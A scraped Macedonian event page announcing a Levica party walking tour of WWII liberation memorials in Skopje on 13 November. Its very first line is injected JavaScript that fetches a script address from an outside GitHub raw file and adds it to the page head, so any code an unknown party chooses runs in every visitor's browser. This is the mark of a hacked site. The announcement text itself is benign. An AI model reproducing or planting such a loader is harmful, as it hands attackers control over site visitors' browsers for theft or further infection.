;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); По патеката на слободата - обиколка низ дел од спомен обележјата на НОБ - Антропол
АктуелноНастани

По патеката на слободата – обиколка низ дел од спомен обележјата на НОБ

По повод 13 Ноември – 80 години од ослободувањето на Скопје од бугарскиот фашистички окупатор, на овој значаен јубилеј, политичката партија Левица ве повикува да ни се придружите на една уникатна пешачка тура низ спомен-обележјата од Народноослободителната борба (НОБ) во Скопје.

Овој ден, кој ги потсетува генерациите на храброста и солидарноста на оние кои се бореа за слободата, ни дава шанса да ги прославиме и одново откриеме вредностите на отпор и единството што треба да нè водат и денес.

На 13 Ноември, застануваме во чест на нашите предци за да ја прераскажеме нивната приказна, приказната за Скопје кое се избори за слобода и правда. Оваа тура ќе нè прошета низ обележјата што сведочат за храброста и самопожртвуваноста на борците кои ги поставија темелите на нашата слобода и државност.

Маршрутата вклучува неколку клучни места кои ја прераскажуваат приказната за слободољубието на Скопје и сеќавањето на деновите кога обичните луѓе станаа народни херои и заедно со останатите југословенски народи извојуваа победа над фашизмот.

Време: [10:00 ч]
Почеток: [Меморијален споменик за Втората светска војна – Бул. Гоце Делчев (Зад МКЦ)]
Учеството е бесплатно

Сè што треба е да земете топла лесна облека, вода, можете да повикате и пријатели или роднини и ваши блиски, добредојдени се сите што сакаат да ја почувствуваат историјата на слободата на нашето Скопје.

Придружете ни се – заедно да чекориме низ историјата и да го славиме духот на слободата!

https://www.facebook.com/share/19Pmcs6Duf